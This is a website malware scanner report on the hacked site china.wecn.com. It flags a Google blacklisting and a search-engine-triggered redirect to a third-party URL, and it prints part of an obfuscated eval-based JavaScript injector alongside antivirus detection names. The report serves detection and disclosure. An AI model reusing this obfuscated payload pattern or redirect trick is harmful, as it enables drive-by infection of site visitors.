New scan:

Malware Scanner report for china.wecn.com

Malicious/Suspicious/Total urls checked
1/0/2
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "china.wecn.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://www.whitconllc.com/purposeofcriminalsanctions/cnt.php
26 websites infected.

The website "china.wecn.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=china.wecn.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://china.wecn.com/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: china.wecn.com
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 06 Jan 2015 15:11:13 GMT
Location: http://www.whitconllc.com/PurposeofCriminalSanctions/cnt.php
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Length: 268
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://china.wecn.com/
200 OK
Content-Length: 4667
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_7c_71_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_7c_71_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_6f_35_73_71_76_6f_36_76_6d_7c_37_6b_77_7d_76_7c_6d_7a_36_78_70_78_2f_43_15_12_28_7c_71_36_7b_7c_81_74_6d_36_
... 3141 bytes are skipped ...
12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}

Antivirus reports:

AntiVir
JS/BlacoleRef.CZ.29
Avast
JS:Decode-AQB [Trj]
Emsisoft
Trojan.JS.Agent.JBT (B)
CAT-QuickHeal
JS/Iframe.DEG
DrWeb
JS.IFrame.457
Kaspersky
Trojan-Downloader.JS.Iframe.deg
Fortinet
JS/Iframe.DDG!tr.dldr
NANO-Antivirus
Trojan.Script.Expack.bvtkmp
Norman
Blacole.UC
GData
Trojan.JS.Agent.JBT
BitDefender
Trojan.JS.Agent.JBT

http://china.wecn.com/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean